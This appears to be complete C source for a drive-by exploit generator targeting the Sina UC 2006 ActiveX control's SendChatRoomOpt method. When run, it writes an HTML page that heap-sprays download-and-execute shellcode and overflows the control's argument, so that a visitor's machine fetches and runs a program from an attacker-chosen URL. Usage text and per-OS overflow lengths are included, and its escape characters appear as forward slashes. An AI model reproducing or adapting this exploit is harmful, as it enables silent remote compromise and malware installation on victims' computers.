Sina UC 2006 Activex SendChatRoomOpt Exploit

// // Sina UC 2006 Activex SendChatRoomOpt Exploit // Code by 云舒 & LuoLuo,ph4nt0morg // #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <string.h> FILE *fp = NULL; char *file = "fuck_uc.html"; char *url = NULL; unsigned char sc[] =     "/x60/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x70" "/x08/x81/xec/x00/x04/x00/x00/x8b/xec/x56/x68/x8e/x4e/x0e/xec/xe8" "/xff/x00/x00/x00/x89/x45/x04/x56/x68/x98/xfe/x8a/x0e/xe8/xf1/x00" "/x00/x00/x89/x45/x08/x56/x68/x25/xb0/xff/xc2/xe8/xe3/x00/x00/x00" "/x89/x45/x0c/x56/x68/xef/xce/xe0/x60/xe8/xd5/x00/x00/x00/x89/x45" "/x10/x56/x68/xc1/x79/xe5/xb8/xe8/xc7/x00/x00/x00/x89/x45/x14/x40" "/x80/x38/xc3/x75/xfa/x89/x45/x18/xe9/x08/x01/x00/x00/x5e/x89/x75" "/x24/x8b/x45/x04/x6a/x01/x59/x8b/x55/x18/x56/xe8/x8c/x00/x00/x00" "/x50/x68/x36/x1a/x2f/x70/xe8/x98/x00/x00/x00/x89/x45/x1c/x8b/xc5" "/x83/xc0/x50/x89/x45/x20/x68/xff/x00/x00/x00/x50/x8b/x45/x14/x6a" "/x02/x59/x8b/x55/x18/xe8/x62/x00/x00/x00/x03/x45/x20/xc7/x00/x5c" "/x7e/x2e/x65/xc7/x40/x04/x78/x65/x00/x00/xff/x75/x20/x8b/x45/x0c" "/x6a/x01/x59/x8b/x55/x18/xe8/x41/x00/x00/x00/x6a/x07/x58/x03/x45" "/x24/x33/xdb/x53/x53/xff/x75/x20/x50/x53/x8b/x45/x1c/x6a/x05/x59" "/x8b/x55/x18/xe8/x24/x00/x00/x00/x6a/x00/xff/x75/x20/x8b/x45/x08" "/x6a/x02/x59/x8b/x55/x18/xe8/x11/x00/x00/x00/x81/xc4/x00/x04/x00" "/x00/x61/x81/xc4/xdc/x04/x00/x00/x5d/xc2/x24/x00/x41/x5b/x52/x03" "/xe1/x03/xe1/x03/xe1/x03/xe1/x83/xec/x04/x5a/x53/x8b/xda/xe2/xf7" "/x52/xff/xe0/x55/x8b/xec/x8b/x7d/x08/x8b/x5d/x0c/x56/x8b/x73/x3c" "/x8b/x74/x1e/x78/x03/xf3/x56/x8b/x76/x20/x03/xf3/x33/xc9/x49/x41" "/xad/x03/xc3/x56/x33/xf6/x0f/xbe/x10/x3a/xf2/x74/x08/xc1/xce/x0d" "/x03/xf2/x40/xeb/xf1/x3b/xfe/x5e/x75/xe5/x5a/x8b/xeb/x8b/x5a/x24" "/x03/xdd/x66/x8b/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5" "/x5e/x5d/xc2/x08/x00/xe8/xf3/xfe/xff/xff/x55/x52/x4c/x4d/x4f/x4e" "/x00"; char * header = "<!--/n" "clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384/n" "C:/Program Files/sina/UC/ActiveX/BROWSER2UC.dll/n/n" "Sub SendChatRoomOpt (/n" "    ByVal astrVerion  As String ,/n" "    ByVal astrUserID  As String ,/n" "    ByVal asDataType  As Integer ,/n" "    ByVal alTypeID  As Long/n" ")/n/n" "ph4nt0m.org, Code By 云舒 & LuoLuo/n" "!-->/n/n" "<html>/n" "<head>/n" "<script language=/"javascript/">/n" "var heapSprayToAddress = 0x0c0c0c0c;/n" "var shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n"; char * footer = "/n" "var heapBlockSize = 0x100000;/n" "var payLoadSize = shellcode.length * 2;/n" "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n" "var spraySlide = unescape(/"%u9090%u9090/");/n/n" "spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n" "heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;/n" "memory = new Array();/n/n" "for (i=0;i<heapBlocks;i++)/n{/n" "/t/tmemory = spraySlide + shellcode;/n}/n" "function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t" "while (spraySlide.length*2<spraySlideSize)/n/t" "{/n/t/tspraySlide += spraySlide;/n/t}/n" "/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) {     int i;     for(i=0;i < buffsize;i+=2)     {         if((i)==0)         {             if(i!=0)             {                 fprintf(fp, "%s", "/" +/n/"");             }             else             {                 fprintf(fp, "%s", "/"");             }         }         fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);     }     //把shellcode打印在header后面，然后用 " ) " 闭合     fprintf(fp, "%s", "/");/n");   } int main( int argc, char *argv[] ) {     if( argc != 3 )     {         printf( "/nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg/n" );         printf( "Usage: %s   <url>   <os>/n", argv[0] );         printf( "      1     Windows XP SP2 Chinese version,IE 6/n" );         printf( "      2     Windows 2003 standard SP1 Chinese Version, IE 6/n" );                  return -1;     }          char    seh[1024] = { 0 };     int        os = atoi( argv[2] );     int        len = 0;          if( os == 1 )     {         len = 3133;     }     else if( os == 2 )     {         len = 3193;     }          sprintf( seh , "var obj = new ActiveXObject(/"BROWSER2UC.BROWSERToUC/");/n/tvar arg1;/n/n<!-- Windows2003 standard SP1 ＋ IE6 此处覆盖长度i为3193 -->/n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->/n/nfor( var i = 0; i < %d; i ++ )/n{/targ1 += /"A/";/n}arg1=arg1 + unescape(/"%%%%/");/narg2=/"defaultV/";/narg3=1;/narg4=1;/nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);/n</script>/n</head>/n</html>", len );          url = argv[1];     if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)     {         printf("[-] Invalid url. Must start with 'http://','ftp://'/n");         return -1;                     }     printf("[+] download url:%s/n", url);     fp = fopen( file , "w" );     if( fp == NULL )     {         printf( "Create file error: %d/n", GetLastError() );         return -1;     }     fprintf( fp, "%s", header );     fflush( fp );          char    buffer[4096] = { 0 };     int        sc_len = sizeof(sc)-1;     memcpy(buffer, sc, sc_len);     memcpy(buffer+sc_len, url, strlen(url));        sc_len += strlen(url)+1;     PrintPayLoad((char *)buffer, sc_len);     fflush( fp );          fprintf( fp, "%s", footer );     fprintf( fp, "%s", seh );          fflush( fp );     fclose( fp );     printf( "Create done!please look %s/n", file ); }